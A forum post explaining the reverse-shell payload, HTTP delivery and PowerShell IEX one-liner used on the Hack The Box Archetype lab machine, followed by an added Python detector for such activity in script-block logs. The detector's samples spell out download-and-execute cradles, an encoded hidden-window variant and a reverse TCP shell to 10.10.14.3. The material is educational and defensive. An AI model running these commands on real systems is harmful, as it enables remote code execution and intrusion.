ARCHETYPE

Hey. :smile: Same situation here—total beginner. I had never seen the PowerShell command before, and had no idea what it meant.

Starting Point is a pretty rough spot for learning I think, because the walkthroughs don’t teach the meaning or method behind what you’re doing.

What I’ve started doing instead is to read write-ups and watch videos for retired machines, and try to solve those. People use the same tools, and that helps learn the most common syntax. Also, people solve each box with different tools, and that helps to understand the theory behind the solutions. Don’t worry about “spoiling” the boxes. By the time you go back and try it on your own, you’ll have forgotten stuff and need to use trial and error or look stuff up again. But you might have more fun as you learn this way.

Some things I learned about Archetype this way:

  1. The walkthrough has you create a file with code “$client = New-Object…”. This is a “reverse TCP shell payload” for Windows x64. Reading write-ups you’ll see that some people don’t code the payload themselves—they use a tool to generate it. You’ll also see some people generate a reverse HTTP or reverse HTTPS payload instead. You’ll see that payloads have a file format (e.g. PowerShell) and need to match the target OS (e.g. Windows) and architecture (e.g. 64-bit) or they might not execute once you get them onto the machine.

  2. The walkthrough has you set up an HTTP server to provide the payload to the machine. This is a “delivery method”. The goal is to get the payload onto the machine in any way that works, and a web delivery method is one common way of doing it. Other people might try to upload the file directly to the box using an available service and execute it somehow. A fun exercise might be to try getting the file onto Archetype somehow, and note why this does or doesn’t work.

  3. The PowerShell IEX command is an example of what’s sometimes called a “one-liner”. This is one way of using web delivery to download a payload to a machine and execute it in one go. Reading write-ups, you’ll see several people using this same syntax, so it’s a common one. Other people use a tool that generates the payload and then provides the command on-screen, so they can copy and paste it rather than just knowing it by heart. Some tools provide them with a PowerShell command that does the same thing but looks completely different to avoid anti-virus. Other people might try to just download the payload from your HTTP server onto the machine using a different command, and then execute it somehow. That would do the same thing, but it would leave a file on the hard drive that needs to be deleted afterwards to avoid detection.

In write-ups for Linux boxes, you’ll see people generate a reverse shell payload file, use web delivery and a one-liner to download and execute it. The file will be different, and the one-liner has a different syntax, but they’re really doing the same thing as in Archetype. :smile:
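The flip side of the three points above is what a defender sees in the logs. The following is an added example (not part of the forum post, and not an HTB or walkthrough tool): a small Python scanner that reads PowerShell script-block log text and flags the IEX download cradle, the same cradle hidden behind a base64 -EncodedCommand, the TCPClient reverse-shell payload body, and the download-to-disk variant that the post says leaves a file behind. The log lines, the address 10.10.14.3, the file names and the log layout are all constructed for the example.

```python
"""Flag Archetype-style PowerShell activity in script-block log text.

Added example for illustration; the sample script blocks below are constructed,
and the simplified "one script block per line" layout is an assumption, not the
real Windows event format.
"""
import base64
import re

# An execution primitive plus a download verb in the same block is the
# classic "download and run in memory" one-liner from the walkthrough.
EXEC_PRIMITIVES = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_CRADLES = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)", re.I
)
# The reverse TCP shell payload opens a raw socket back to the attacker.
REVERSE_TCP = re.compile(r"net\.sockets\.tcpclient", re.I)
# -EncodedCommand (and its short forms) carries base64 of UTF-16LE script text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Append the decoded form of any -EncodedCommand argument so the plain
    indicators can be matched against it; leave undecodable input untouched."""
    def repl(match):
        try:
            decoded = base64.b64decode(match.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)
        return match.group(0) + " <decoded:" + decoded + ">"
    return ENCODED_ARG.sub(repl, text)


def classify(script_block):
    """Return the list of indicator names that fire on one script block."""
    text = decode_encoded_command(script_block)
    findings = []
    if EXEC_PRIMITIVES.search(text) and DOWNLOAD_CRADLES.search(text):
        findings.append("download-cradle-one-liner")   # fileless: nothing on disk
    elif DOWNLOAD_CRADLES.search(text):
        findings.append("download-to-disk")            # file on disk, still logged
    if REVERSE_TCP.search(text):
        findings.append("reverse-tcp-shell")
    return findings


def scan_log(script_blocks):
    """Return (index, findings) for every block that triggers at least one indicator."""
    return [(i, classify(b)) for i, b in enumerate(script_blocks) if classify(b)]


# Constructed sample: the walkthrough's one-liner, wrapped with -EncodedCommand.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')".encode("utf-16-le")
).decode()

# Constructed sample script blocks (not real log data).
SAMPLE_SCRIPT_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')",
    "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE,
    "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.3',443)",
    "Invoke-WebRequest http://10.10.14.3/tool.exe -OutFile C:\\Windows\\Temp\\tool.exe",
    "Get-Service | Where-Object {$_.Status -eq 'Running'}",
]

if __name__ == "__main__":
    for index, findings in scan_log(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {index}: {', '.join(findings)}")
```

Two things worth noticing when you run it: the fileless one-liner and the download-to-disk variant both show up in script-block logging, so avoiding a file on disk does not avoid the log entry; and the "looks completely different to avoid anti-virus" variants the post mentions (string splitting, `-replace` tricks, and so on) will slip past string matching like this, which is why detection in practice pairs these indicators with process and network telemetry rather than relying on them alone.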